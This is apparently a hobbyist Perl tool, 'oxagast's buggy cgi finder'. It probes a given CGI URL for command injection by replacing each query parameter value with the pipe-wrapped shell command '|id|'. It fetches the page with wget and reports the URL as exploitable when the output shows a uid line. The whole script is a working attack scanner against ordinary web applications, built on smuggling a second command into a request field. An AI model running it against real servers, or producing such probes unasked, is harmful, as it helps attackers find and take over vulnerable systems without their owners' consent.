#!/usr/bin/perl

#oxagast

if (@ARGV[0] eq "") {
        print "             ---===  oxagast's buggy cgi finder ===---\n\n";
        print "Please provide a URL with a CGI script and it's args.\n";
        print "ex.  $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\"\n";
        exit;
}


@urlquestionsplit = split(/\?/, @ARGV[0]);
$baseurl = @urlquestionsplit[0];
@inputafterquestion = split(/\&/, @urlquestionsplit[1]);

for $countargs (0..scalar(@inputafterquestion)) {
        $numofargs = $countargs;
}


for $cgiargsplitter (0..$numofargs) {
        @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
        push @cgiargsaftereq, @cgiaanda[1];
}
for $thisarg (0..$numofargs-1) {
        $wholestring = @urlquestionsplit[1];
        $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/;
        push @urltotest, "$baseurl?$wholestring";
}


for $argnumber (0..$numofargs) {
system("echo \"wget -q -O gettmp \'@urltotest[$argnumber]\'\" > getfile.sh");
system("chmod u+x getfile.sh");
system("./getfile.sh");
@gotstuff = `cat gettmp`;
$done = 0;
$exploitable;
for $line (0..scalar(@gotstuff)-1) {
        if (@gotstuff[$line] =~ m/uid/) {
                if ($done == 0) {
                        $done = 1;
                        $firstline = $line;
                        @gotstuff[$line] =~ m/.*uid(.*)\).*/;
                        $uidline = "uid$1)";
                        print "Exploitable...\n";
                        print "@urltotest[$argnumber]\n";
                        print "$uidline\n";
                        unlink(gettemp);
                        unlink(getfile.sh);
                        $exploitable = 1;
                }
        }
}
system("rm gettmp getfile.sh");
}
if ($exploitable == 0) {
        print "Sorry, not exploitable...\n";
}